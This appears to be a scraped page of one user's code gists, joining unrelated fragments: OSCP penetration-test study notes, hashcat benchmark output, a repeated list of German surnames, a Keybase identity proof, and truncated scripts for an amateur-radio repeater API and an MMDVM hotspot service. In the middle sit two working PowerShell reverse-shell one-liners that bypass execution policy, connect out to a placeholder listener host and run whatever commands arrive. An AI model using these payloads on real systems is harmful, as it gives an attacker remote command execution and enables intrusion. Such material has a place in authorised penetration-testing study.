UPDATE: Excellent resource here: https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
- Recon
- Find vuln
- Exploit
- Escalate
- Document it
| hashcat (v6.1.1) starting in benchmark mode... | |
| Benchmarking uses hand-optimized kernel code by default. | |
| You can use it in your cracking session by setting the -O option. | |
| Note: Using optimized kernel code limits the maximum supported password length. | |
| To disable the optimized kernel code in benchmark mode, use the -w option. | |
| CUDA API (CUDA 11.4) | |
| ==================== | |
| * Device #1: Quadro P1000, 3996/4039 MB, 5MCU |
| Mueller | |
| Schmidt | |
| Schneider | |
| Fischer | |
| Weber | |
| Meyer | |
| Wagner | |
| Becker | |
| Schulz | |
| Hoffmann |
| Mueller | |
| Schmidt | |
| Schneider | |
| Fischer | |
| Weber | |
| Meyer | |
| Wagner | |
| Becker | |
| Schulz | |
| Hoffmann |
UPDATE: Excellent resource here: https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
| powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('HOST',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
| powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
| ### Keybase proof | |
| I hereby claim: | |
| * I am laemmy on github. | |
| * I am laemmy (https://keybase.io/laemmy) on keybase. | |
| * I have a public key ASC_Cheg6wUXr2x_OCuUebHpekmXDWO9zbYPiTLdBtrNfwo | |
| To claim this, I am signing this object: |
| #!/usr/bin/env python3 | |
| # | |
| import requests | |
| import json | |
| URL="https://repeatermap.de/api.php" | |
| result=requests.get(URL) | |
| repeater=result.json() | |
| def print_csv(): | |
| #print("0;num;type;callsign;dmrid;qrg;shift;cc;mix;ctcss;net;city;cnty;country;ctry;lat;lon;longcall;callext1;callext2;txcontact1;rxgroup1;txcontact2;rxgroup2;pwr;scanlist1;scanlist2;scanlistfm") |
| #! /bin/bash | |
| ### BEGIN INIT INFO | |
| # Provides: MMDVM Hotspot | |
| # Required-Start: $local_fs $network | |
| # Required-Stop: $local_fs | |
| # Default-Start: 2 3 4 5 | |
| # Default-Stop: 0 1 6 | |
| # Short-Description: MMDVM Hotspot service | |
| # Description: MMDVM Hotspot service |